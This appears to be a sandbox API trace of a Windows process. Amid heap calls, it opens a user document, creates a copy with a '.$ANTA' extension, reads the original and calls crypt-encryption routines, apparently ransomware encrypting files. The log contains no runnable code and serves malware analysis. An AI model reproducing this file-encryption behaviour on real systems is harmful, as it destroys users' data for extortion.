[0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0084.055] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0084.055] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.055] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.055] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0084.055] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0084.056] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0084.056] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0084.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0084.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0084.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0084.057] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0084.058] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0084.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0084.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0084.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0084.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\favorites.vssx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0084.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0084.059] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0084.059] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.059] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0084.059] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0084.059] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0084.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0084.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0084.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0084.064] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0084.064] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0084.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0084.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0084.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0084.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0084.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0084.067] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.068] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0084.068] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0084.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0084.069] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0084.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0084.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0084.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0084.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0084.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0084.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0084.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0084.070] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0084.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0084.071] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0084.071] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0084.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0084.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca928 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0084.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0084.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 